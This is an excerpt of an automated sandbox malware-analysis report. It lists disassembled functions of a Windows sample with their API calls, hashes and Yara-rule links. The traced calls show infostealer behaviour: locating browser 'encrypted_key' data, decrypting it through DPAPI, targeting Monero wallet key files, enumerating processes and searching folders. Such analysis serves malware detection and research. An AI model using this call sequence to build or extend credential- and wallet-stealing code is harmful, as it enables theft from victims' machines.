                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: d5ecd625161af27c08434c0ee3bbf556287401f8e0ed58c9dc1f414ba370e230
                                  • Instruction ID: 5ab34934dd4beef911c6b915124c5bfcae17256a1bd8f1e2fbb7d1623aaf347d
                                  • Opcode Fuzzy Hash: d5ecd625161af27c08434c0ee3bbf556287401f8e0ed58c9dc1f414ba370e230
                                  • Instruction Fuzzy Hash: 83418FB1D10219EFDB04EFE5E859AEEB778AF44304F008418E51677291DB3CAA05CFA6
                                  Function 00719CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00719D39
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                    • Part of subcall function 00719AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                    • Part of subcall function 00719AC0: LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                    • Part of subcall function 00719B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00719B84
                                    • Part of subcall function 00719B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00719BA3
                                    • Part of subcall function 00719B60: LocalFree.KERNEL32(?), ref: 00719BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 2098a98c9950228068d683a9efceb85570f3e18d1b43d6ab01bf908facdfd317
                                  • Instruction ID: 66e80c1da6874ed784f5b15596c83480dedab02a7801743b05b518464cb5f67b
                                  • Opcode Fuzzy Hash: 2098a98c9950228068d683a9efceb85570f3e18d1b43d6ab01bf908facdfd317
                                  • Instruction Fuzzy Hash: DA3132B5E10109ABDB04DFE8DC95AEFB7B8BF48304F544518EA05B7281E7389A45CBA1
                                  Function 00728680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007305B7), ref: 007286CA
                                  • Process32First.KERNEL32(?,00000128), ref: 007286DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 007286F3
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • CloseHandle.KERNEL32(?), ref: 00728761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 76bd1784acd5063514adbd9f302e4d983c8702a7eab5f0f0f958e7690d75ca16
                                  • Instruction ID: fc929db1f5b754dd0e5c2d8c37841822eb437a6c583968238d906f48844cbb61
                                  • Opcode Fuzzy Hash: 76bd1784acd5063514adbd9f302e4d983c8702a7eab5f0f0f958e7690d75ca16
                                  • Instruction Fuzzy Hash: 6C316F71901228EBCB25DF51EC45FEEB778FF48700F104299E509A22A0DB386A45CFA2
                                  Function 00727980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00730E00,00000000,?), ref: 007279B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007279B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00730E00,00000000,?), ref: 007279C4
                                  • wsprintfA.USER32 ref: 007279F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: bb2e4b65642240157e7e0557eed082f7e7e686097026ccd96407824e86cc5d48
                                  • Instruction ID: db6263fa04fc970693c41e81aa0e0e9b38a9e5a1ab24103b91cdd366593f8520
                                  • Opcode Fuzzy Hash: bb2e4b65642240157e7e0557eed082f7e7e686097026ccd96407824e86cc5d48
                                  • Instruction Fuzzy Hash: 5C1130B2918218ABCB14DFCADD45BBEB7F8FB4CB12F10421AF605A2280D3395940D775
                                  Function 0072C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0072C74E
                                    • Part of subcall function 0072BF9F: __amsg_exit.LIBCMT ref: 0072BFAF
                                  • __getptd.LIBCMT ref: 0072C765
                                  • __amsg_exit.LIBCMT ref: 0072C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0072C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: e0731b2218a148ac2904a8d6699cf9c85ac93238c597f2bca8a169f48657f010
                                  • Instruction ID: 90f4267973ba256f8852b88635557b3350a53790c12674a14e7055b275c066d6
                                  • Opcode Fuzzy Hash: e0731b2218a148ac2904a8d6699cf9c85ac93238c597f2bca8a169f48657f010
                                  • Instruction Fuzzy Hash: 19F0BE32900730EBE722BBB8BD4BB5E33A06F10721F258249F505A62D3CB6C59409E5A
                                  Function 00724F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724F7A
                                  • lstrcat.KERNEL32(?,00731070), ref: 00724F97
                                  • lstrcat.KERNEL32(?,01229D00), ref: 00724FAB
                                  • lstrcat.KERNEL32(?,00731074), ref: 00724FBD
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 0072492C
                                    • Part of subcall function 00724910: FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                    • Part of subcall function 00724910: FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                    • Part of subcall function 00724910: FindClose.KERNEL32(000000FF), ref: 00724B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 786835c65852fc82cafcaa84f8cdd4a4113c9beeb7d78283f95883a9a36471eb
                                  • Instruction ID: 7e91b57ba52f7b9a0ff46229dfe8629f494c308b921ed1c5d8bf2547bbdc3a05
                                  • Opcode Fuzzy Hash: 786835c65852fc82cafcaa84f8cdd4a4113c9beeb7d78283f95883a9a36471eb
                                  • Instruction Fuzzy Hash: 1B210DB6914308A7C754FB70EC4AEED333CAB54301F404644B78996181EE79ABC98B97